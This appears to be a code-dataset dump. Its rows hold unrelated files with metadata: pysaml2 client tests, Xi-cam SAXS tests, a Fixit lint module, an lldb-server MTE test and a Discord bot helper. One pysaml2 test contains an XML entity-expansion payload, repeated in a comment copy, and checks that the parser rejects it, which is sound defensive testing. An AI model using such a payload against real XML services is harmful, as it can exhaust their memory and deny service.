"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
# The tests below can only be run against the dummy (fake) server
IDP = "urn:mace:example.com:saml:roland:idp"
class TestClientWithDummy():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.SPConfig()
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_do_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_negotiated_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = \
self.client.prepare_for_negotiated_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert binding == auth_binding
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_attribute_query(self):
response = self.client.do_attribute_query(
IDP, "_e7b68a04488f715cda642fbdd90099f5",
attribute={"eduPersonAffiliation": None},
nameid_format=NAMEID_FORMAT_TRANSIENT)
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
        # Normally a response would now be sent back to the user's web client.
        # Here I fake what the client would do and create the form POST myself.
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
# Explicitly allow unsigned responses for this test
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
def test_negotiated_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = self.client.prepare_for_negotiated_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
assert binding == auth_binding
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
        # Normally a response would now be sent back to the user's web client.
        # Here I fake what the client would do and create the form POST myself.
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
class TestClientNoConfigContext():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.Config() # not SPConfig
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_parse_soap_enveloped_saml_xxe():
xml = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]>
<lolz>&lol1;</lolz>
"""
with raises(EntitiesForbidden):
parse_soap_enveloped_saml(xml, None)
if __name__ == "__main__":
tc = TestClient()
tc.setup_class()
tc.test_sign_then_encrypt_assertion()
| en | 0.61638 | #!/usr/bin/env python # -*- coding: utf-8 -*- # Sometimes we get an xml header, sometimes we don't. # Check name_format ?? <?xml version='1.0' encoding='UTF-8'?> <ns0:AttributeQuery Destination="https://idp.example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0" xmlns:ns0="urn:oasis:names:tc:SAML:2 .0:protocol"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2 .0:nameid-format:entity" xmlns:ns1="urn:oasis:names:tc:SAML:2 .0:assertion">urn:mace:example.com:saml:roland:sp</ns1:Issuer><ns1:Subject xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion"><ns1:NameID Format="urn:oasis:names:tc:SAML:2 .0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID ></ns1:Subject></ns0:AttributeQuery> <?xml version='1.0' encoding='UTF-8'?> <ns0:AttributeQuery xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion" Destination="https://idp .example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">urn:mace:example .com:saml:roland:sp</ns1:Issuer><ns1:Subject><ns1:NameID Format="urn:oasis:names:tc:SAML:2 .0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID ></ns1:Subject></ns0:AttributeQuery> # one is givenName # vo # missing certificate # One person in the cache # The information I have about the subject comes from one source # --- authenticate another person # Two persons in the cache # The information I have about the subjects comes from the same source # One person in the cache # The information I have about the subject comes from one source # Begin with the IdPs side # Create an Assertion instance from the signed assertion #www.example.com", # Now over to the client side # Begin with the IdPs side # strangely enough I get different tags if I run this test separately # or as part of a bunch of tests. # seresp = samlp.response_from_string(enctext) # Now over to the client side # Explicitely allow unsigned responses for this and the following 2 tests # assert resp.encrypted_assertion == [] # Begin with the IdPs side # xmldoc = "%s" % response # strangely enough I get different tags if I run this test separately # or as part of a bunch of tests. # xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass) # seresp = samlp.response_from_string(enctext) # Now over to the client side # assert resp.encrypted_assertion == [] # Begin with the IdPs side # seresp = samlp.response_from_string(enctext) # Now over to the client side # assert resp.encrypted_assertion == [] # Revert configuration change to disallow unsinged responses # information about the user from an IdP # information about the user from an IdP # information about the user from an IdP # Below can only be done with dummy Server one IdP/AA logout from # information about the user from an IdP # Normally a response would now be sent back to the users web client # Here I fake what the client will do # create the form post # Explicitly allow unsigned responses for this test # Normally a response would now be sent back to the users web client # Here I fake what the client will do # create the form post # not SPConfig one IdP/AA logout from # information about the user from an IdP <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> ]> <lolz>&lol1;</lolz> | 1.429538 | 1 |
xicam/SAXS/tests/test_workflows.py | ihumphrey/Xi-cam.SAXS | 1 | 6632454 | <filename>xicam/SAXS/tests/test_workflows.py
from collections import namedtuple
import fabio
import numpy as np
from pyFAI import detectors, calibrant
from pyFAI.azimuthalIntegrator import AzimuthalIntegrator
import pytest
from xicam.core import execution
from xicam.core.execution import localexecutor
from xicam.SAXS.calibration.workflows import FourierCalibrationWorkflow
from xicam.SAXS.workflows.xpcs import OneTime, TwoTime
execution.executor = localexecutor.LocalExecutor()
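# Calibration smoke test: runs the Fourier calibration workflow against a local
# AgBh (silver behenate) image using a Pilatus 2M detector geometry.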
def test_FourierCalibrationWorkflow():
workflow = FourierCalibrationWorkflow()
data = fabio.open('/home/rp/data/YL1031/AGB_5S_USE_2_2m.edf').data
ai = AzimuthalIntegrator()
ai.set_wavelength(124e-12)
ai.detector = detectors.Pilatus2M()
c = calibrant.ALL_CALIBRANTS('AgBh')
print(workflow.execute(None, data=data, ai=ai, calibrant=c, callback_slot=print))
FRAMES = 100
SHAPE = (10, 10)
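# Synthetic XPCS input: a small random frame stack plus a single-label ROI mask.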
@pytest.fixture
def images():
return np.random.random((FRAMES, *SHAPE))
@pytest.fixture
def labels():
return np.ones(SHAPE)
class TestOneTimeWorkflow:
def test_no_darks(self, images, labels):
        workflow = OneTime()
workflow.execute_synchronous(images=images, labels=labels)
# TODO should dark correction be required?
    def test_with_darks(self, images, labels):
        workflow = OneTime()
workflow.execute_synchronous(images=images,
labels=labels,
darks=None,
flats=None)
class TestTwoTimeWorkflow:
def test_no_darks(self, images, labels):
workflow = TwoTime()
result = workflow.execute_synchronous(images=images,
labels=labels)
print(result)
def test_with_darks(self):
... | <filename>xicam/SAXS/tests/test_workflows.py
from collections import namedtuple
import fabio
import numpy as np
from pyFAI import detectors, calibrant
from pyFAI.azimuthalIntegrator import AzimuthalIntegrator
import pytest
from xicam.core import execution
from xicam.core.execution import localexecutor
from xicam.SAXS.calibration.workflows import FourierCalibrationWorkflow
from xicam.SAXS.workflows.xpcs import OneTime, TwoTime
execution.executor = localexecutor.LocalExecutor()
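# Calibration smoke test: runs the Fourier calibration workflow against a local
# AgBh (silver behenate) image using a Pilatus 2M detector geometry.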
def test_FourierCalibrationWorkflow():
workflow = FourierCalibrationWorkflow()
data = fabio.open('/home/rp/data/YL1031/AGB_5S_USE_2_2m.edf').data
ai = AzimuthalIntegrator()
ai.set_wavelength(124e-12)
ai.detector = detectors.Pilatus2M()
c = calibrant.ALL_CALIBRANTS('AgBh')
print(workflow.execute(None, data=data, ai=ai, calibrant=c, callback_slot=print))
FRAMES = 100
SHAPE = (10, 10)
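# Synthetic XPCS input: a small random frame stack plus a single-label ROI mask.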
@pytest.fixture
def images():
return np.random.random((FRAMES, *SHAPE))
@pytest.fixture
def labels():
return np.ones(SHAPE)
class TestOneTimeWorkflow:
def test_no_darks(self, images, labels):
        workflow = OneTime()
workflow.execute_synchronous(images=images, labels=labels)
# TODO should dark correction be required?
    def test_with_darks(self, images, labels):
        workflow = OneTime()
workflow.execute_synchronous(images=images,
labels=labels,
darks=None,
flats=None)
class TestTwoTimeWorkflow:
def test_no_darks(self, images, labels):
workflow = TwoTime()
result = workflow.execute_synchronous(images=images,
labels=labels)
print(result)
def test_with_darks(self):
... | en | 0.829431 | # TODO should dark correction be required? | 2.152318 | 2 |
fixit/common/report.py | Instagram/Fix | 0 | 6632455 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import abc
import ast
from pathlib import Path
from pickle import PicklingError
from typing import Collection, Optional, Sequence, Union
import libcst as cst
from fixit.common.autofix import LintPatch
class BaseLintRuleReport(abc.ABC):
"""
Represents a lint violation. This is generated by calling `self.context.report`
in your lint rule, and is saved to the context's `reports` list.
"""
file_path: Path
code: str
message: str
# This is the line/column where the lint rule reported the violation. `arc lint` may
# report a different line/column when a patch is applied because it requires that
# the start of the patch is the same as the reported line/column.
line: int
column: int
def __init__(
self, *, file_path: Path, code: str, message: str, line: int, column: int
) -> None:
self.file_path = file_path
self.code = code
self.message = message
self.line = line
self.column = column
@property
def patch(self) -> Optional[LintPatch]:
return None
def __repr__(self) -> str:
return f"{self.line}:{self.column}: {self.code} {self.message}"
def __reduce__(self) -> None:
raise PicklingError(
"Lint rule reports are potentially very complex objects. They can contain "
+ "a syntax tree or an entire module's source code. They should not be "
+ "pickled (or returned by a multiprocessing worker). Instead, extract "
+ "the fields you care about, and pickle those."
)
class AstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: ast.AST,
code: str,
message: str,
line: int,
column: int,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
class CstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: cst.CSTNode,
code: str,
message: str,
line: int,
column: int,
module: cst.MetadataWrapper,
module_bytes: bytes,
replacement_node: Optional[
Union[cst.CSTNode, cst.FlattenSentinel, cst.RemovalSentinel]
] = None,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
self.module = module
self.module_bytes = module_bytes
self.replacement_node = replacement_node
self._cached_patch: Optional[LintPatch] = None
# Ideally this would use functools.cached_property, but that's only in py3.8+.
@property
def patch(self) -> Optional[LintPatch]:
"""
Computes and returns a `LintPatch` object.
"""
replacement_node = self.replacement_node
if replacement_node is None:
return None
cached = self._cached_patch
if cached is None:
cached = LintPatch.get(
wrapper=self.module,
original_node=self.node,
replacement_node=replacement_node,
).minimize()
self._cached_patch = cached
return cached
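# The base classes below define the interface lint runners use to report results;
# per their docstrings, concrete implementations are expected to be dataclasses.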
class LintFailureReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, exception_traceback: str, **kwargs: object
) -> Sequence["LintFailureReportBase"]:
...
class LintSuccessReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, reports: Collection[BaseLintRuleReport], **kwargs: object
) -> Sequence["LintSuccessReportBase"]:
...
| # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import abc
import ast
from pathlib import Path
from pickle import PicklingError
from typing import Collection, Optional, Sequence, Union
import libcst as cst
from fixit.common.autofix import LintPatch
class BaseLintRuleReport(abc.ABC):
"""
Represents a lint violation. This is generated by calling `self.context.report`
in your lint rule, and is saved to the context's `reports` list.
"""
file_path: Path
code: str
message: str
# This is the line/column where the lint rule reported the violation. `arc lint` may
# report a different line/column when a patch is applied because it requires that
# the start of the patch is the same as the reported line/column.
line: int
column: int
def __init__(
self, *, file_path: Path, code: str, message: str, line: int, column: int
) -> None:
self.file_path = file_path
self.code = code
self.message = message
self.line = line
self.column = column
@property
def patch(self) -> Optional[LintPatch]:
return None
def __repr__(self) -> str:
return f"{self.line}:{self.column}: {self.code} {self.message}"
def __reduce__(self) -> None:
raise PicklingError(
"Lint rule reports are potentially very complex objects. They can contain "
+ "a syntax tree or an entire module's source code. They should not be "
+ "pickled (or returned by a multiprocessing worker). Instead, extract "
+ "the fields you care about, and pickle those."
)
class AstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: ast.AST,
code: str,
message: str,
line: int,
column: int,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
class CstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: cst.CSTNode,
code: str,
message: str,
line: int,
column: int,
module: cst.MetadataWrapper,
module_bytes: bytes,
replacement_node: Optional[
Union[cst.CSTNode, cst.FlattenSentinel, cst.RemovalSentinel]
] = None,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
self.module = module
self.module_bytes = module_bytes
self.replacement_node = replacement_node
self._cached_patch: Optional[LintPatch] = None
# Ideally this would use functools.cached_property, but that's only in py3.8+.
@property
def patch(self) -> Optional[LintPatch]:
"""
Computes and returns a `LintPatch` object.
"""
replacement_node = self.replacement_node
if replacement_node is None:
return None
cached = self._cached_patch
if cached is None:
cached = LintPatch.get(
wrapper=self.module,
original_node=self.node,
replacement_node=replacement_node,
).minimize()
self._cached_patch = cached
return cached
class LintFailureReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, exception_traceback: str, **kwargs: object
) -> Sequence["LintFailureReportBase"]:
...
class LintSuccessReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, reports: Collection[BaseLintRuleReport], **kwargs: object
) -> Sequence["LintSuccessReportBase"]:
...
| en | 0.914426 | # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. Represents a lint violation. This is generated by calling `self.context.report` in your lint rule, and is saved to the context's `reports` list. # This is the line/column where the lint rule reported the violation. `arc lint` may # report a different line/column when a patch is applied because it requires that # the start of the patch is the same as the reported line/column. # Ideally this would use functools.cached_property, but that's only in py3.8+. Computes and returns a `LintPatch` object. An implementation needs to be a dataclass. An implementation needs to be a dataclass. | 2.453962 | 2 |
lldb/test/API/tools/lldb-server/memory-tagging/TestGdbRemoteMemoryTagging.py | acidburn0zzz/llvm-project | 2 | 6632456 | <filename>lldb/test/API/tools/lldb-server/memory-tagging/TestGdbRemoteMemoryTagging.py
import gdbremote_testcase
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestGdbRemoteMemoryTagging(gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def check_qmemtags_response(self, body, expected):
self.test_sequence.add_log_lines(["read packet: $qMemTags:{}#00".format(body),
"send packet: ${}#00".format(expected),
],
True)
self.expect_gdbremote_sequence()
@skipUnlessArch("aarch64")
@skipUnlessPlatform(["linux"])
@skipUnlessAArch64MTELinuxCompiler
def test_qmemtags_packets(self):
""" Test that qMemTags packets are parsed correctly and/or rejected. """
self.build()
self.set_inferior_startup_launch()
procs = self.prep_debug_monitor_and_inferior()
# Run the process
self.test_sequence.add_log_lines(
[
# Start running after initial stop
"read packet: $c#63",
# Match the address of the MTE page
{"type": "output_match",
"regex": self.maybe_strict_output_regex(r"buffer: (.+) page_size: (.+)\r\n"),
"capture": {1: "buffer", 2: "page_size"}},
# Now stop the inferior
"read packet: {}".format(chr(3)),
# And wait for the stop notification
{"direction": "send", "regex": r"^\$T[0-9a-fA-F]{2}thread:[0-9a-fA-F]+;"}],
True)
# Run the packet stream
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
buf_address = context.get("buffer")
self.assertIsNotNone(buf_address)
page_size = context.get("page_size")
self.assertIsNotNone(page_size)
# nil means we couldn't set up a tagged page because the
# target doesn't support it.
if buf_address == "(nil)":
self.skipTest("Target must support MTE.")
buf_address = int(buf_address, 16)
page_size = int(page_size, 16)
# In the tests below E03 means the packet wasn't formed correctly
# and E01 means it was but we had some other error acting upon it.
# Sanity check that address is correct
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# Invalid packets
# No content
self.check_qmemtags_response("", "E03")
# Only address
self.check_qmemtags_response("{:x}".format(buf_address), "E03")
# Only address and length
self.check_qmemtags_response("{:x},20".format(buf_address), "E03")
# Empty address
self.check_qmemtags_response(",20:1", "E03")
# Invalid addresses
self.check_qmemtags_response("aardvark,20:1", "E03")
self.check_qmemtags_response("-100,20:1", "E03")
self.check_qmemtags_response("cafe?,20:1", "E03")
# Empty length
self.check_qmemtags_response("{:x},:1".format(buf_address), "E03")
# Invalid lengths
self.check_qmemtags_response("{:x},food:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},-1:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},12??:1".format(buf_address), "E03")
# Empty type
self.check_qmemtags_response("{:x},10:".format(buf_address), "E03")
# Types we don't support
self.check_qmemtags_response("{:x},10:FF".format(buf_address), "E01")
# (even if the length of the read is zero)
self.check_qmemtags_response("{:x},0:FF".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:-1".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:+20".format(buf_address), "E01")
# Invalid type format
self.check_qmemtags_response("{:x},10:cat".format(buf_address), "E03")
self.check_qmemtags_response("{:x},10:?11".format(buf_address), "E03")
# Valid packets
# Reading nothing is allowed
self.check_qmemtags_response("{:x},0:1".format(buf_address), "m")
# A range that's already aligned
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# lldb-server should re-align the range
# Here we read from 1/2 way through a granule, into the next. Expands to 2 granules
self.check_qmemtags_response("{:x},10:1".format(buf_address+64-8), "m0304")
# Read up to the end of an MTE page.
# We know that the last tag should be 0xF since page size will always be a
# multiple of 256 bytes, which is 16 granules and we have 16 tags to use.
self.check_qmemtags_response("{:x},10:1".format(buf_address+page_size-16), "m0f")
# Here we read off of the end of the MTE range so ptrace gives us one tag,
# then fails on the second call. To lldb-server this means the response
# should just be an error, not a partial read.
self.check_qmemtags_response("{:x},20:1".format(buf_address+page_size-16), "E01")
# Note that we do not test reading over a page boundary within the same
# mapping. That logic is handled in the kernel itself so it's just a single
# ptrace call for lldb-server.
| <filename>lldb/test/API/tools/lldb-server/memory-tagging/TestGdbRemoteMemoryTagging.py
import gdbremote_testcase
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestGdbRemoteMemoryTagging(gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def check_qmemtags_response(self, body, expected):
self.test_sequence.add_log_lines(["read packet: $qMemTags:{}#00".format(body),
"send packet: ${}#00".format(expected),
],
True)
self.expect_gdbremote_sequence()
@skipUnlessArch("aarch64")
@skipUnlessPlatform(["linux"])
@skipUnlessAArch64MTELinuxCompiler
def test_qmemtags_packets(self):
""" Test that qMemTags packets are parsed correctly and/or rejected. """
self.build()
self.set_inferior_startup_launch()
procs = self.prep_debug_monitor_and_inferior()
# Run the process
self.test_sequence.add_log_lines(
[
# Start running after initial stop
"read packet: $c#63",
# Match the address of the MTE page
{"type": "output_match",
"regex": self.maybe_strict_output_regex(r"buffer: (.+) page_size: (.+)\r\n"),
"capture": {1: "buffer", 2: "page_size"}},
# Now stop the inferior
"read packet: {}".format(chr(3)),
# And wait for the stop notification
{"direction": "send", "regex": r"^\$T[0-9a-fA-F]{2}thread:[0-9a-fA-F]+;"}],
True)
# Run the packet stream
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
buf_address = context.get("buffer")
self.assertIsNotNone(buf_address)
page_size = context.get("page_size")
self.assertIsNotNone(page_size)
# nil means we couldn't set up a tagged page because the
# target doesn't support it.
if buf_address == "(nil)":
self.skipTest("Target must support MTE.")
buf_address = int(buf_address, 16)
page_size = int(page_size, 16)
# In the tests below E03 means the packet wasn't formed correctly
# and E01 means it was but we had some other error acting upon it.
# Sanity check that address is correct
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# Invalid packets
# No content
self.check_qmemtags_response("", "E03")
# Only address
self.check_qmemtags_response("{:x}".format(buf_address), "E03")
# Only address and length
self.check_qmemtags_response("{:x},20".format(buf_address), "E03")
# Empty address
self.check_qmemtags_response(",20:1", "E03")
# Invalid addresses
self.check_qmemtags_response("aardvark,20:1", "E03")
self.check_qmemtags_response("-100,20:1", "E03")
self.check_qmemtags_response("cafe?,20:1", "E03")
# Empty length
self.check_qmemtags_response("{:x},:1".format(buf_address), "E03")
# Invalid lengths
self.check_qmemtags_response("{:x},food:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},-1:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},12??:1".format(buf_address), "E03")
# Empty type
self.check_qmemtags_response("{:x},10:".format(buf_address), "E03")
# Types we don't support
self.check_qmemtags_response("{:x},10:FF".format(buf_address), "E01")
# (even if the length of the read is zero)
self.check_qmemtags_response("{:x},0:FF".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:-1".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:+20".format(buf_address), "E01")
# Invalid type format
self.check_qmemtags_response("{:x},10:cat".format(buf_address), "E03")
self.check_qmemtags_response("{:x},10:?11".format(buf_address), "E03")
# Valid packets
# Reading nothing is allowed
self.check_qmemtags_response("{:x},0:1".format(buf_address), "m")
# A range that's already aligned
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# lldb-server should re-align the range
# Here we read from 1/2 way through a granule, into the next. Expands to 2 granules
self.check_qmemtags_response("{:x},10:1".format(buf_address+64-8), "m0304")
# Read up to the end of an MTE page.
# We know that the last tag should be 0xF since page size will always be a
# multiple of 256 bytes, which is 16 granules and we have 16 tags to use.
self.check_qmemtags_response("{:x},10:1".format(buf_address+page_size-16), "m0f")
# Here we read off of the end of the MTE range so ptrace gives us one tag,
# then fails on the second call. To lldb-server this means the response
# should just be an error, not a partial read.
self.check_qmemtags_response("{:x},20:1".format(buf_address+page_size-16), "E01")
# Note that we do not test reading over a page boundary within the same
# mapping. That logic is handled in the kernel itself so it's just a single
# ptrace call for lldb-server.
| en | 0.886867 | #00".format(body), #00".format(expected), Test that qMemTags packets are parsed correctly and/or rejected. # Run the process # Start running after initial stop #63", # Match the address of the MTE page # Now stop the inferior # And wait for the stop notification # Run the packet stream # nil means we couldn't set up a tagged page because the # target doesn't support it. # In the tests below E03 means the packet wasn't formed correctly # and E01 means it was but we had some other error acting upon it. # Sanity check that address is correct # Invalid packets # No content # Only address # Only address and length # Empty address # Invalid addresses # Empty length # Invalid lengths # Empty type # Types we don't support # (even if the length of the read is zero) # Invalid type format # Valid packets # Reading nothing is allowed # A range that's already aligned # lldb-server should re-align the range # Here we read from 1/2 way through a granule, into the next. Expands to 2 granules # Read up to the end of an MTE page. # We know that the last tag should be 0xF since page size will always be a # multiple of 256 bytes, which is 16 granules and we have 16 tags to use. # Here we read off of the end of the MTE range so ptrace gives us one tag, # then fails on the second call. To lldb-server this means the response # should just be an error, not a partial read. # Note that we do not test reading over a page boundary within the same # mapping. That logic is handled in the kernel itself so it's just a single # ptrace call for lldb-server. | 1.971064 | 2 |
things/BOTUTL.py | BananasCanCodeToo/Acron-Discord-Bot | 3 | 6632457 | import discord
import datetime
import json
import pickle
import yaml
from discord.ext import commands, tasks
from discord import Embed, Member
from datetime import timedelta
from itertools import cycle
import things.UTILITIES as utl
async def startgame(user, code, guild, bot):
x = datetime.datetime.now()
games = utl.r_games()
game = False
# looks to see if this player already has a game
for i,e in games.items():
if i == f'{user.id}':
game = True
break
if game == False:
gChannel = utl.settings()['GAME_CHANNEL']
gameChannel = bot.get_channel(gChannel)
currentPing = x
ping = ''
if utl.ping() == True:
ping = guild.get_role(utl.settings()['SQUIRREL_ROLE']).mention
# Sends game code
e = discord.Embed(colour=discord.Color.orange(),title=f"**{code}**",description='React with 🐿️ if you joined')
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
message = await gameChannel.send(embed = e, content = f'{ping}')
await message.add_reaction(emoji="🐿️")
try:
utl.w_pgames(user.id, 'pop')
except KeyError:
pass
games = utl.r_games()
# Writes the game to the Game JSON file
utl.w_games(user.id, [message.id,code,x.strftime("%Y.%m.%d.%H:%M:%S")])
return True
else:
return False
async def pgames(user):
pgames = utl.r_pgames()
code = ''
for i,e in pgames.items():
if i == f'{user.id}':
code = e[1]
return code
async def endgame(user, bot):
# Opens game file to find message ID and game code
games = utl.r_games()
game = False
for i,e in games.items():
if i == f'{user.id}':
game = True
# Gets the message ID and game code
if game == True:
contents = games[f'{user.id}']
messageID = contents[0]
code = contents[1]
# Removes game from games.json
utl.w_games(user.id, 'pop')
# Gets the message from the ID
gChannel = utl.settings()['GAME_CHANNEL']
channel = bot.get_channel(gChannel)
message = await channel.fetch_message(int(messageID))
# Edits the embed to say the game has ended
e = discord.Embed(colour=discord.Color.red(),title="*ENDED*",description=f"**{code}**")
